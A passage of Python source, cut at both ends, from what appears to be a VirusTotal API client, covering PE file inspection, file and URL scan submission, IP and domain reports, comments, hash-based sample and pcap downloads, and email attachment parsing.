"x", "0x3": "sx", "0x4": "r", "0x5": "sr", "0x6": "rx", "0x8": "w", "0xa": "wx", "0xc": "rw", } if PEFILE: files = kwargs.get('value') for file in files: try: pe = pefile.PE(file) except pefile.PEFormatError: print('[-] Not PE file') return print("\nName: {0}".format(file.split(b"/")[-1])) print("\n[+] Hashes") print("MD5: {0}".format(pe.sections[0].get_hash_md5())) print("SHA1: {0}".format(pe.sections[0].get_hash_sha1())) print("SHA256: {0}".format(pe.sections[0].get_hash_sha256())) print("SHA512: {0}".format(pe.sections[0].get_hash_sha512())) try: print('ImpHash: {0}'.format(pe.get_imphash())) except Exception as e: pass print("\n[+] Protections:") plist = [[]] plist.append([ str(bool(pe.OPTIONAL_HEADER.DllCharacteristics & 0x0040)), str(bool(pe.OPTIONAL_HEADER.DllCharacteristics & 0x0100)), str(bool(pe.OPTIONAL_HEADER.DllCharacteristics & 0x0400)), str(bool(pe.OPTIONAL_HEADER.DllCharacteristics & 0x4000)), ]) pretty_print_special(plist, ['ASLR', 'DEP', "SEG", "CFG"], [5, 5, 5, 5], ['c', 'c', 'c', 'c'], True) del plist if pe.FILE_HEADER.TimeDateStamp: print("\n[+] Created") val = pe.FILE_HEADER.TimeDateStamp ts = '0x%-8X' % (val) try: ts += ' [%s UTC]' % time.asctime(time.gmtime(val)) that_year = time.gmtime(val)[0] this_year = time.gmtime(time.time())[0] if that_year < 2000 or that_year > this_year: ts += " [SUSPICIOUS]" except Exception as e: ts += ' [SUSPICIOUS]' if ts: print('\t{}'.format(ts)) if pe.sections: print("\n[+] Sections") plist = [[]] for section in pe.sections: if hex(section.Characteristics)[:3] in mem_perm: perm = str(mem_perm[hex(section.Characteristics)[:3]]) else: perm = hex(section.Characteristics)[:3] plist.append([section.Name.decode("utf-8").rstrip("\0"), section.SizeOfRawData, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.Characteristics), perm]) pretty_print_special(plist, ['Name', 'SizeOfRawData', "VA", "Virtual Size", "Characteristics", "R|W|X"], [10, 15, 10, 10, 15, 5], ['c', 'c', 'c', 'c', 'c', 'c'], True) del plist if hasattr(pe, "DIRECTORY_ENTRY_IMPORT") and pe.DIRECTORY_ENTRY_IMPORT: print("\n[+] Imports") for entry in pe.DIRECTORY_ENTRY_IMPORT: print(' {}'.format(entry.dll.decode())) for imp in entry.imports: print('\t{} {}'.format(hex(imp.address), imp.name.decode() if imp.name is not None else "")) try: if pe.IMAGE_DIRECTORY_ENTRY_EXPORT.symbols: print("\n[+] Exports") for exp in pe.IMAGE_DIRECTORY_ENTRY_EXPORT.symbols: print(hex(pe.OPTIONAL_HEADER.ImageBase + exp.address), exp.name, exp.ordinal) except Exception as e: pass if MAGIC and pe: try: ms = magic.from_file(file) if ms: print("\n[+] File type") ms = magic.from_file(file) print('\t{}'.format(ms)) except Exception as e: print(e) if kwargs.get('userdb') and os.path.exists(kwargs.get('userdb')): signatures = peutils.SignatureDatabase(kwargs.get('userdb')) if signatures.match(pe, ep_only = True) != None: print("\n[+] Packer") print('\t{}'.format(signatures.match(pe, ep_only = True)[0])) else: pack = peutils.is_probably_packed(pe) if pack == 1: print("\n[+] Packer") print("\t[+] Based on the sections entropy check! file is possibly packed") # ToDo verify if works def fileScan(self, *args, **kwargs): """ Allows to send a file to be analysed by VirusTotal. Before performing your submissions we encourage you to retrieve the latest report on the files, if it is recent enough you might want to save time and bandwidth by making use of it. File size limit is 32MB, in order to submmit files up to 200MB you must request an special upload URL. Before send to scan, file will be checked if not scanned before, for save bandwich and VT resources :) """ result = False if len(kwargs.get('value')) == 1 and isinstance(kwargs.get('value'), list): if os.path.isdir(kwargs.get('value')[0]): # ToDo os.walk for Marc kwargs['value'] = glob(os.path.join(kwargs.get('value')[0], '*')) if kwargs.get('file_scan_recursive'): all_files = list() for path, dirs, files in os.walk(kwargs['value']): for file in files: all_files.append(os.path.join(path, file)) kwargs['value'] = all_files url = self.base.format('files') if not kwargs.get('scan'): for index, c_file in enumerate(kwargs.get('value')): if os.path.isfile(c_file): if (os.path.getsize(c_file) / 1048576) <= 128: kwargs.get('value')[index] = hashlib.md5(open(c_file, 'rb').read()).hexdigest() else: print('[!] Ignored file: {file}, size is to big, permitted size is 128Mb'.format(file=c_file)) kwargs['not_exit'] = True hash_list = kwargs.get('value') for submit_file in hash_list: kwargs.update({'value':submit_file}) # Check all list of files, not only one result = self.getReport(**kwargs) if not result and kwargs.get('scan') is True: if os.path.isfile(submit_file): file_name = os.path.split(submit_file)[-1] files = {"file": (file_name, open(submit_file, 'rb'))} try: jdata, response = get_response( url, files=files, #params=self.params, method="post" ) if kwargs.get('return_raw'): return jdata print("[+] Scan ID: {}".format(jdata["data"]["id"])) except UnicodeDecodeError: print('\n[!] Sorry filaname is not utf-8 format, other format not suported at the moment') print('[!] Ignored file: {file}\n'.format(file=submit_file)) elif not result and kwargs.get('scan') == False: print('\nReport for file/hash : {0} not found'.format(submit_file)) # ToDo finish def url_scan_and_report(self, *args, **kwargs): """ Url scan: URLs can also be submitted for scanning. Once again, before performing your submission we encourage you to retrieve the latest report on the URL, if it is recent enough you might want to save time and bandwidth by making use of it. Url report: A URL will retrieve the most recent report on the given URL. You may also specify a scan_id (sha256-timestamp as returned by the URL submission API) to access a specific report. At the same time, you can specify a space separated list made up of a combination of hashes and scan_ids so as to perform a batch request with one single call (up to 4 resources or 25 if you have private api, per call with the standard request rate). """ url_uploads = list() result = False md5_hash = '' if kwargs.get('value')[0].endswith('.json'): result, name = is_file(kwargs.get('value')) if result: jdata = load_file(name) kwargs['dump'] = False else: if isinstance(kwargs.get('value'), list) and len(kwargs.get('value')) == 1: if os.path.isfile(kwargs.get('value')[0]): url_uploads = open(kwargs.get('value')[0], 'rb').readlines() else: url_uploads = kwargs.get('value') elif isinstance(kwargs.get('value'), six.string_types): url_uploads = [kwargs.get('value')] elif len(kwargs.get('value')) > 1 and not isinstance(kwargs.get('value'), six.string_types): pass cont = 0 for url_upload in url_uploads: cont += 1 to_show = url_upload if isinstance(url_upload, list): if "\n" in url_upload[0]: to_show = "\n\t".join(url_upload[0].split(b"\n")) else: to_show = "\n\t".join(url_upload) url = self.base.format('urls') if kwargs.get('key') == 'scan': print('Submitting url(s) for analysis: \n\t{url}'.format(url=to_show)) self.params['url'] = url_upload elif kwargs.get('key') == 'report': print('\nSearching for url(s) report: \n\t{url}'.format(url=to_show)) self.params['resource'] = base64.urlsafe_b64encode(url_upload.encode("utf-8")).strip(b"=") self.params['scan'] = kwargs.get('action') url = self.base.format('urls/report') jdata, response = get_response(url, params=self.params, method="post") if kwargs.get('return_raw'): return jdata if isinstance(jdata, list): for jdata_part in jdata: if jdata_part is None: print('[-] Nothing found') else: if kwargs.get('dump'): md5_hash = hashlib.md5(jdata_part['url']).hexdigest() if kwargs.get('key') == 'report': kwargs.update({'url_report':True}) parse_report(jdata_part, **kwargs) elif kwargs.get('key') == 'scan': if jdata_part["data"].get('id'): print('\n\ID : {id}\t{url}'.format(id=jdata_part['data']['id'], url=jdata_part['url'])) else: #print(jdata) if jdata is None: print('[-] Nothing found') elif _check_error(jdata): pass # ToDo rid of this else: if kwargs.get('dump'): md5_hash = hashlib.md5(jdata['data']['id'].encode("utf-8")).hexdigest() jsondump(json, md5_hash) if kwargs.get('key') == 'report': kwargs.update({'url_report': True}) parse_report(jdata, **kwargs) elif kwargs.get('key') == 'scan': _check_error(jdata) if cont % 4 == 0: print('[+] Sleep 60 seconds between the requests') time.sleep(60) def __parse_relationships(self, jdata, value): keys = ('communicating_files', 'downloaded_files', 'graphs', 'referrer_files', 'resolutions', 'siblings', 'subdomains', 'urls') for key in keys: if key in jdata and jdata[key].get("data", []): self.print_key(key, indent='\n', separator='[+]') for block in jdata[key].get("data", []): if key == "resolutions": print('\t', block['id'].replace(value, '')) else: print('\t', block['id']) def getIP(self, *args, **kwargs): """ A valid IPv4 address in dotted quad notation, for the time being only IPv4 addresses are supported. """ jdatas = list() return_json = dict() try: result, name = is_file(kwargs.get('value')[0]) if result: jdatas = [load_file(name)] kwargs['dump'] = False md5_hash = '' except IndexError: print('Something going wrong') return if not jdatas: if isinstance(kwargs.get('value'), list) and len(kwargs.get('value')) == 1: pass elif isinstance(kwargs.get('value'), six.string_types): kwargs['value'] = [kwargs.get('value')] kwargs['value'] = [urlparse(ip).netloc if ip.startswith(('http://', 'https://')) else ip for ip in kwargs.get('value')] url = self.base.format('ip_addresses/') for ip in kwargs.get('value'): url += ip if kwargs.get('ip_post_comments'): url += '/comments' method = 'post' elif kwargs.get('ip_get_comments'): url += '/comments' method = 'get' else: #url += '/' + kwargs['ip_get_relationships'] self.params["relationships"] = 'communicating_files,downloaded_files,graphs,referrer_files,urls' method = "get" jdata, response = get_response(url, method=method, params=self.params) #print(jdata) jdatas.append((ip, jdata)) if kwargs.get('return_raw'): return jdatas for ip, jdata in jdatas: if jdata.get('data', False) is not False: if not (kwargs.get('return_json') or kwargs.get('return_raw')) and kwargs.get('verbose'): print('\n[+] IP:', ip) if kwargs.get("ip", False) is True: simple_list = ( 'asn', 'as_owner', 'country', 'continent', 'network', 'regional_internet_registry', 'reputation', 'total_votes', #: {'harmless': 3, 'malicious': 0}}, ) for key in simple_list: if jdata['data']['attributes'].get(key, "") and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key:jdata['data']['attributes'][key]}) else: self.print_key(key, indent='\n', separator='[+]') print('\t', jdata['data']['attributes'].get(key)) self.__parse_relationships(jdata['data']['relationships'], ip) elif kwargs.get("ip_get_comments", False) is True: simple_list = ( "date", "tags", "text", "votes", "links" ) for block in jdata['data']: print("[+] Comment ID: {}".format(block["id"])) for key in simple_list: if block["attributes"].get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key:block["attributes"][key]}) else: self.print_key(key, indent='', separator='\t[+]') if key == "date": print('\t', datetime.fromtimestamp(block["attributes"].get(key)).strftime('%Y-%m-%d %H:%M:%S')) else: print('\t', block["attributes"].get(key)) #elif kwargs.get("ip_post_comments", False) is True: else: #self._print_complex_dict(jdata['data'], 'categories') self.__parse_relationships(jdata['data']['relationships'], ip) simple_list = ( "url", "last_final_url", "tags", "total_votes", "last_analysis_date", "last_analysis_stats", ) """ for block in jdata['data']['attributes']: print(block) for key in simple_list: if block["attributes"].get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key:block["attributes"][key]}) else: self.print_key(key, indent='', separator='\t[+]') if key == "last_analysis_date": print('\t', datetime.fromtimestamp(block["attributes"].get(key)).strftime('%Y-%m-%d %H:%M:%S')) else: print('\t', block["attributes"].get(key)) #[{u'attributes': {u'total_votes': {u'harmless': 0, u'malicious': 0}, u'last_final_url': u'https://msg3.club/', u'tags': [], u'url': u'https://msg3.club/', u'last_analysis_date': 1551639858, u'last_analysis_stats': {u'harmless': 57, u'malicious': 1, u'suspicious': 0, u'undetected': 8, u'timeout': 0}, u'first_submission_date': 1551639858, self.last_analysis_results(block['attributes'], args, kwargs) """ if kwargs.get('return_json'): return_json.update(self.__detected_samples(jdata, *args, **kwargs)) else: return_json = self.__detected_samples(jdata, *args, **kwargs) if jdata.get('resolutions') and ((kwargs.get('resolutions') or 'resolutions' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({'resolutions':jdata['resolutions']}) else: print('\n[+] Lastest domain resolved\n') pretty_print(sorted(jdata['resolutions'], key=methodcaller( 'get', 'last_resolved'), reverse=True), ['last_resolved', 'hostname'], False, False, kwargs.get('email_template') ) if kwargs.get('dump') is True: md5_hash = hashlib.md5(name).hexdigest() jsondump(jdata, md5_hash) if kwargs.get('return_json'): return return_json def getDomain(self, *args, **kwargs): """ Get domain last scan, detected urls and resolved IPs """ return_json = dict() jdatas = list() try: result, name = is_file(kwargs.get('value')[0]) if result: jdatas = [load_file(name)] kwargs['dump'] = False md5_hash = '' except IndexError: print('[-] Something going wrong') return if not jdatas: if isinstance(kwargs.get('value'), list) and len(kwargs.get('value')) == 1 and \ os.path.exists(kwargs.get("value")[0]) and kwargs.get("value")[0].endswith(".txt"): kwargs["value"] = [domain.strip() for domain in open(kwargs.get("value")[0], "rb").readlines()] elif isinstance(kwargs.get('value'), six.string_types): kwargs['value'] = [kwargs.get('value')] kwargs['value'] = [urlparse(domain).netloc.lower() if domain.startswith(('http://', 'https://')) else domain for domain in kwargs.get('value')] url = self.base.format('domains/') for domain in kwargs.get('value'): url = self.base.format('domains/{}'.format(domain)) if kwargs.get('domain_post_comments'): url += '/comments' method = 'post' data = '{"data": {"type": "comment", "attributes": {"text": "Lorem ipsum dolor sit ..."}}}' elif kwargs.get('domain_get_comments'): url += '/comments' method = 'get' else: #url += '/' + kwargs['domain_get_relationships'] self.params["relationships"] = 'communicating_files,downloaded_files,graphs,referrer_files,resolutions,siblings,subdomains,urls' method = "get" jdata, response = get_response(url, method=method, params=self.params) jdatas.append((domain, jdata)) if kwargs.get('return_raw'): return jdatas for domain, jdata in jdatas: if jdata.get('data'): jdata = jdata['data'] if not (kwargs.get('return_json') or kwargs.get('return_raw')) and kwargs.get('verbose'): print('\n[+] Domain:', domain) single_dict = ( 'TrendMicro category', 'Dr.Web category', 'BitDefender category', 'Websense ThreatSeeker category', 'Alexa category', 'Alexa domain info', 'Alexa rank', 'Opera domain info', 'subdomains', 'siblings', ) complicated_dict = ( 'WOT domain info', 'Webutation domain info', ) for key in single_dict: if jdata.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key: jdata[key]}) else: self.print_key(key) if isinstance(jdata[key], list): print('\t', '\n\t'.join(jdata[key])) else: print('\t{0}'.format(jdata[key])) for key in complicated_dict: if jdata.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key: jdata[key]}) else: self.__print_complex_dict(jdata, key, kwargs) if jdata['attributes'].get('whois') and ((kwargs.get('whois') or 'whois' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({'whois': jdata['attributes']['whois']}) else: print('\n[+] Whois data:\n') try: print('\t', jdata['attributes']['whois'].replace('\n', '\n\t')) except: try: print('\t', jdata['attributes']['whois'].encode('utf-8', 'replace').replace('\n', '\n\t')) except: print('Old version of python has some problems with converting chars to ansii') self._print_complex_dict(jdata['attributes'], 'categories') self.__parse_relationships(jdata['relationships'], domain) if kwargs.get("domain_get_comments", False) is True: simple_list = ( "date", "tags", "text", "votes", "links" ) for block in jdata: print("[+] Comment ID: {}".format(block["id"])) for key in simple_list: if block.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key: block["attributes"][key]}) else: self.print_key(key, indent='', separator='\t[+]') if key == "date": print('\t', datetime.fromtimestamp(block.get(key)).strftime('%Y-%m-%d %H:%M:%S')) else: print('\t', block.get(key)) # ToDo #elif kwargs.get("post_post_comments", False) is True: elif kwargs.get('domain_get_relationships', False): self._print_complex_dict(jdata['attributes'], 'categories') self.__parse_relationships(jdata['relationships'], domain) """ simple_list = ( "url", "last_final_url", "tags", "total_votes", "last_analysis_date", "last_analysis_stats", ) for block in jdata['attributes']: print(block) for key in simple_list: if block.get(key, "") and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key:block[key]}) else: self.print_key(key, indent='', separator='\t[+]') if key == "last_analysis_date": print('\t', datetime.fromtimestamp(block.get(key)).strftime('%Y-%m-%d %H:%M:%S')) else: print('\t', block.get(key)) #[{u'attributes': {u'total_votes': {u'harmless': 0, u'malicious': 0}, u'last_final_url': u'https://msg3.club/', u'tags': [], u'url': u'https://msg3.club/', u'last_analysis_date': 1551639858, u'last_analysis_stats': {u'harmless': 57, u'malicious': 1, u'suspicious': 0, u'undetected': 8, u'timeout': 0}, u'first_submission_date': 1551639858, self.last_analysis_results(block, args, kwargs) """ if kwargs.get('return_json'): return_json.update(self.__detected_samples(jdata, *args, **kwargs)) else: return_json = self.__detected_samples(jdata, *args, **kwargs) if jdata.get('pcaps') and ((kwargs.get('pcaps') or 'pcaps' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({'pcaps': jdata['pcaps']}) else: print('\n') pretty_print(jdata['pcaps'], ['pcaps'], [70], ['c'], kwargs.get('email_template')) if jdata.get('resolutions') and ((kwargs.get('resolutions') or 'resolutions' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({'passive_dns': jdata['resolutions']['data']}) else: print('\n[+] Passive DNS replication\n') pretty_print(jdata['resolutions']['data'], ['ip_address', 'type'], [25, 20], ['c', 'c'], kwargs.get('email_template') ) if kwargs.get('walk') and jdata.get('resolutions', {}).get("data", []): filter_ip = list() for ip in jdata['resolutions']['data']: ip = ip['id'].replace(domain, '') if ip not in filter_ip: print('\n\n[+] Checking data for ip: {0}'.format(ip)) kwargs['value'] = ip self.getIP(**kwargs) if kwargs.get('dump') is True: md5_hash = hashlib.md5(name.encode("utf-8")).hexdigest() jsondump(jdata, md5_hash) if kwargs.get('return_json'): return return_json # ToDo remove? def clusters(self, *args, **kwargs): """ VirusTotal has built its own in-house file similarity clustering functionality. At present, this clustering works only on PE files and is based on a very basic PE feature hash, which can be very often confused by certain compression and packing strategies. In other words, this clustering logic is no holly grail. This API offers a programmatic access to the clustering section of VirusTotal Intelligence: https://www.virustotal.com/intelligence/clustering/ Please note that you must be logged in with a valid VirusTotal Community user with access to VirusTotal Intelligence in order to be able to view the clustering listing. All of the API responses are JSON objects, if no clusters were identified for the given time frame, this JSON will have a response_code property equal to 0, if there was some sort of error with your query this code will be set to -1, if your query succeded and file similarity clusters were found it will have a value of 1 and the rest of the JSON properties will contain the clustering information. """ result, name = is_file(kwargs.get('value')[0]) if result: jdata = load_file(name) dump = False else: url = self.base.format('file/clusters') if by_id: self.params['query'] = 'cluster:{0}'.format(kwargs.get('value')[0]) else: self.params['date'] = name jdata, response = get_response(url, params=self.params) if kwargs.get('return_raw'): return jdata if _check_error(jdata): return simple_list = ( 'size_top200', 'num_clusters', ) self.simple_print(jdata, simple_list, indent='\n\t') for key in simple_list: if jdata.get(key): self.print_key(key, indent='\n\t') print('\n\t', jdata.get(key)) if jdata.get('clusters'): plist = [[]] for line in jdata['clusters']: plist.append( [line['label'], line['avg_positives'], line['id'], line['size']]) pretty_print_special( plist, ['Label', 'AV Detections', 'Id', 'Size'], [40, 15, 80, 8], ['l', 'c', 'l', 'c'], kwargs.get('email_template') ) if dump: jsondump(jdata, 'clusters_{0}'.format(name)) # ToDo verify add comment def comment(self, *args, **kwargs): """ Add comment: The actual review, you can tag it using the "#" twitter-like syntax (e.g. #disinfection #zbot) and reference users using the "@" syntax (e.g. @VirusTotalTeam). Get comments: The application answers with the comments sorted in descending order according to their date. Please note that, for timeout reasons, the application will only answer back with at most 25 comments. If the answer contains less than 25 comments it means that there are no more comments for that item. On the other hand, if 25 comments were returned you should keep issuing further calls making use of the optional before parameter, this parameter should be fixed to the oldest (last in the list) comment's date token, exactly in the same way as returned by your previous API call (e.g. 20120404132340). """ result, name = is_file(kwargs.get('value')) if result: jdata = load_file(name) else: value = kwargs.get('value') if value[0].startswith('http'): result_hash = re.findall('[\w\d]{64}', value[0], re.I) if result_hash: value = result_hash[0] else: print('[-] Hash not found in url') return url = self.base.format('files/{id}/comments'.format(id = value[0])) if kwargs.get('action') == 'add': self.params['comment'] = value[1] jdata, response = get_response(url, params=self.params, method="post") elif kwargs.get('action') == 'get': #if value[0]: # self.params['before'] = kwargs.get('date') jdata, response = get_response(url) #params=self.params else: print('\n[!] Support only get/add comments action \n') return #import code #code.interact(local=dict(globals(), **locals())) if kwargs.get('return_raw'): return jdata if kwargs.get('action') == 'add': _check_error(jdata) else: if "data" not in jdata: print('\n[!] This analysis doen\'t have any comment\n') return else: if jdata.get('data'): for comment in jdata['data']: date_formated = datetime.fromtimestamp(comment["attributes"]['date']).strftime('%Y-%m-%d %H:%M:%S') if comment['attributes'].get('date'): print('Date : {0}'.format(date_formated)) if comment['attributes'].get('tags'): print('Tags : {0}'.format(", ".join(comment['attributes']['tags']))) if comment['attributes'].get('text'): print('Comment : {0}\n'.format(comment['attributes']['text'])) if comment.get('id'): print('Comment ID : {0}\n'.format(comment['id'])) def download(self, *args, **kwargs): """ Files that are successfully executed may communicate with certain network resources, all this communication is recorded in a network traffic dump (pcap file). This API allows you to retrieve the network traffic dump generated during the file's execution. The md5/sha1/sha256 hash of the file whose network traffic dump you want to retrieve. """ if isinstance(kwargs.get("value"), list) and len(kwargs.get("value")) == 1: if os.path.exists(kwargs.get("value")[0]) and kwargs.get("value")[0].endswith(".txt"): kwargs["value"] = [dl_hash.strip() for dl_hash in open(kwargs.get("value")[0], "rb").readlines()] elif isinstance(kwargs.get("value"), six.string_types): kwargs["value"] = [kwargs.get("value")] kwargs["value"] = deque(kwargs["value"]) threads = kwargs.get("download_threads", 5) if len(kwargs["value"]) < threads: threads = len(kwargs["value"]) threads_list = list() self.downloaded_to_return = dict() self._stop = threading.Event() self._stop.set() for worked in range(threads): thread = threading.Thread(target=self.__downloader, args=args, kwargs=kwargs) thread.daemon = True thread.start() threads_list.append(thread) while kwargs["value"]: time.sleep(1) self._stop.clear() for thread in threads_list: thread.join() if kwargs.get("return_raw", False): return self.downloaded_to_return def __name_auxiliar(self, *args, **kwargs): name = kwargs.get('name') if os.path.exists(name): i = 0 while True: if not os.path.exists('{}_{}'.format(name, i)): name = '{}_{}'.format(name, i) break i += 1 return name def __downloader(self, *args, **kwargs): """ Auxiliar threaded downloader """ super_file_type = kwargs.get('download') while kwargs['value'] and self._stop.is_set(): try: f_hash = kwargs['value'].pop() f_hash = f_hash.strip() if isinstance(f_hash, bytes): f_hash = f_hash.decode("utf-8") if f_hash != '': if f_hash.find(',') != -1: file_type = f_hash.split(',')[-1] f_hash = f_hash.split(',')[0] else: file_type = super_file_type file_type = kwargs.get('download') if f_hash.startswith('http'): result_hash = re.findall('[\w\d]{64}', f_hash, re.I) if result_hash: f_hash = result_hash[0] else: print('[-] Hash not found in url') url = "https://www.virustotal.com/api/v3/files/{id}/download".format(id = f_hash) jdata, response = get_response(url) if response: if response.status_code == 404: print('\n[!] File not found - {0}\n'.format(f_hash)) if response.status_code == 200: if kwargs.get('name', ""): name = self.__name_auxiliar(*args, **kwargs) else: name = '{hash}'.format(hash=f_hash) if file_type == "pcap": name += ".pcap" #Sanity checks downloaded_hash = '' if len(f_hash) == 32: downloaded_hash = hashlib.md5(response.content).hexdigest() elif len(f_hash) == 40: downloaded_hash = hashlib.sha1(response.content).hexdigest() elif len(f_hash) == 64: downloaded_hash = hashlib.sha256(response.content).hexdigest() if f_hash != downloaded_hash: print('[-] Downloaded content has not the same hash as requested') if kwargs.get('return_raw'): self.downloaded_to_return.setdefault(f_hash, response.content) else: dumped = open(name, 'wb') dumped.write(response.content) dumped.close() print('\tDownloaded to File -- {name}'.format(name=name)) else: self.downloaded_to_return.setdefault(f_hash, 'failed') except Exception as e: print(e) self._stop.set() # normal email attachment extractor def __email_parse_attachment(self, message_part): attachment = '' filename = '' size = '' content_type = '' sha256_hash = '' sha1_hash = '' md5_hash = '' if message_part.get_filename(): filename = message_part.get_filename() content_type = message_part.get_content_type() attachment = message_part.get_payload(decode=True) if attachment: size = len(attachment) sha256_hash = hashlib.sha256(attachment).hexdigest() sha1_hash = hashlib.sha1(attachment).hexdigest() md5_hash = hashlib.md5(attachment).hexdigest() return attachment, filename, size, content_type, sha256_hash, sha1_hash, md5_hash def __email_print(self, email_dict, email_id, *args, **kwargs): if len(email_id) >=64: # in case if you pass full email instead of hash email_id = hashlib.sha256(email_id.encode("utf-8")).hexdigest() print('\n[+] Details of email: {0}'.format(email_id)) plist = [[]] if 'Attachments' in email_dict: for i, part in enumerate(email_dict['Attachments']): path_where_save = kwargs.get('save_attachment') if path_where_save: if not os.path.exists(path_where_save): os.makedirs(path_where_save) print('[+] Saving attachment with hash: {0}'.format(email_dict['Attachments'][i]['sha256'])) dump_file = open(os.path.join(path_where_save, email_dict['Attachments'][i]['sha256']), 'wb') # ToDo improve this """ if email_dict['Attachments'][i]['attachment'].startswith("filename="): attach_parts = email_dict['Attachments'][i]['attachment'].split(b"\r\n\r\n") if len(attach_parts) >= 2: email_dict['Attachments'][i]['attachment'] = base64.b64decode(attach_parts[1]) """ dump_file.write(email_dict['Attachments'][i]['attachment']) dump_file.close() del email_dict['Attachments'][i]['attachment'] key_s, value_s = get_sizes(email_dict) for k,v in sorted(email_dict.items()): if k == 'Attachments': line = '' for part in email_dict['Attachments']: #to have order for value in ('md5', 'sha1', 'sha256', 'name', 'size', 'content_type'): if value == "name": try: line += '{0} : {1}\n'.format(value, part.get(value, "").encode("utf-8", "replace")) except Exception as e: print(value, e) else: line += '{0} : {1}\n'.format(value, part.get(value, "")) plist.append([k,line]) else: plist.append([k,v]) if plist != [[]]: pretty_print_special( plist, ['Key', 'Value'], [key_s, value_s], ['r', 'l'], kwargs.get('email_template') ) def __download_email(self, email_id, *args, **kwargs): original_email = '' original_email = self.download(**{ 'value': [email_id], 'api_type': kwargs.get('api_type'), 'download': 'file', 'intelligence': kwargs.get('intelligence'), 'return_raw': True, }) return original_email def email_remove_bad_char(self, email): ''' I saw few emails which start with ">" and they not parsed correctly''' try: if email.startswith(b'>'): email = email[1:] except Exception as e: print(e) return email def parse_email(self, *args, **kwargs): msg = '' email_dict = dict() def re_compile_our(*pattern): return re_compile_orig(pattern[0].replace("?P<end>--", "?P<end>--+")) if kwargs.get('value'): result, name = is_file(kwargs.get('value')) if result: msg = load_file(name) kwargs['dump'] = False for email_id in kwargs.get('value'): if os.path.exists(email_id): email_id = open(email_id, 'rb').read() else: if email_id.startswith(b'http'): email_id = re.findall('[\w\d]{64}', email_id, re.I) if email_id: email_id = email_id[0] else: print('[-] Hash not found in url') if len(email_id) in (32, 40, 64): # md5, sha1, sha256 email_id = self.__download_email(email_id, *args, **kwargs) elif isinstance(email_id, str): email_id = {"email": email_id} elif isinstance(email_id, bytes): email_id = {"email": email_id} #.decode('utf-8') try: for email__id in email_id: email__id = email_id[email__id] email__id = self.email_remove_bad_char(email__id) # save if kwargs.get('download'): if kwargs.get('name'): self.__name_auxiliar(*args, **kwargs) else: name = hashlib.sha256( email__id.encode('utf-8') ).hexdigest() + '.eml' # save email save_email = open(name, 'wb') save_email.write(email__id) save_email.close() re.compile = re_compile_our msg = email.message_from_string(email__id.decode("latin-1")) re.compile = re_compile_orig except Exception as e: print(e) return '' if msg: email_dict = dict() email_dict.setdefault("email_id", hashlib.sha256(email__id).hexdigest()) email_dict['Attachments'] = list() for k, v in msg.items(): email_dict[k] = v for part in msg.walk(): attachment, name, size, content_type, sha256_hash, sha1_hash, md5_hash = self.__email_parse_attachment(part) if attachment: email_dict['Attachments'].append({ 'attachment': attachment, 'name': name, 'size': size, 'content_type': content_type, 'sha256': sha256_hash, 'sha1': sha1_hash, 'md5': md5_hash }) elif part.get_content_type() == "text/plain": email_dict['Body'] = part.get_payload(decode=True) elif part.get_content_type() == "text/html": email_dict['Body_html'] = part.get_payload(decode=True) if not kwargs.get('return_json'): self.__email_print( email_dict, hashlib.sha256(email__id).hexdigest(), #.encode('utf-8') *args, **kwargs ) return email_dict def parse_email_outlook(self, *args, **kwargs): if OUTLOOK_prsr: email_dict = dict() for email_id in kwargs.get('value'): if len(email_id) in (32, 40, 64): # md5, sha1, sha256 email_id = self.__download_email(email_id, *args, **kwargs) else: email_id = dict() for value in kwargs.get('value'): email_id.update({value: value}) try: for email_hash in email_id: if kwargs.get('download', False): if kwargs.get('name'): self.__name_auxiliar(args, kwargs) else: name = hashlib.sha256(email_id.encode('utf-8')).hexdigest() + '.eml' # save email save_email = open(name, 'wb') save_email.write(email_id[email_hash]) save_email.close() msg = OUTLOOK(email_id[email_hash]) email_dict.update(msg.parse_outlook_email()) if not kwargs.get('return_json'): self.__email_print( email_dict, email_id[email_hash], *args, **kwargs ) except IOError: return {'status': 'Not OLE file'} if kwargs.get('return_json'): return email_dict return {'status': 'missed library'} # ToDo dist remove def distribution(self, *args, **kwargs): """ Note that scan items are not kept forever in the distribution queue, they are automatically removed after 6 hours counting from the time they were put in the queue. You have a 6 hours time frame to get an item from the queue. The timestamp property value is what you need to iterate through your queue using the before and after call parameters. """ jdata = '' if kwargs.get('value'): result, name = is_file(kwargs.get('value')) if result: jdata = load_file(name) kwargs['dump'] = False else: if kwargs.get('before'): self.params['before'] = kwargs.get('before') if kwargs.get('after'): self.params['after'] = kwargs.get('after') if kwargs.get('limit'): self.params['limit'] = kwargs.get('limit') if kwargs.get('action') == 'file': if kwargs.get('reports'): self.params['reports'] = str(kwargs.get('reports')).lower() url = self.base.format('file/distribution') elif kwargs.get('action') == 'url': if kwargs.get('allinfo'): self.params['allinfo'] = '1' url = self.base.format('url/distribution') jdata, response = get_response(url, params=self.params) if kwargs.get('return_raw'): return jdata simple_list = ( 'md5', 'sha1', 'sha256', 'pe-imphash', 'authentihash', 'size', 'filetype', 'peid' 'source_id', 'first_seen', 'last_seen', 'scan_date', 'score', 'timestamp', 'url', 'pe-entry-point', 'pe-machine-type' ) for vt_file in jdata: if _check_error(jdata): return if kwargs.get('action') == 'file': self.simple_print(vt_file, simple_list) if vt_file.get('report'): plist = [[]] for key in vt_file['report']: plist.append( [key, 'True' if jdata[0]['report'][key][0] else 'False', jdata[0]['report'][key][1], jdata[0]['report'][key][2]]) pretty_print_special(plist, ['Vendor name', 'Detection', 'Version', 'Update'], False, False, kwargs.get('email_template')) if vt_file.get('link'): print('\nLink : {link}'.format(link=vt_file['link'])) elif kwargs.get('action') == 'url': for key in 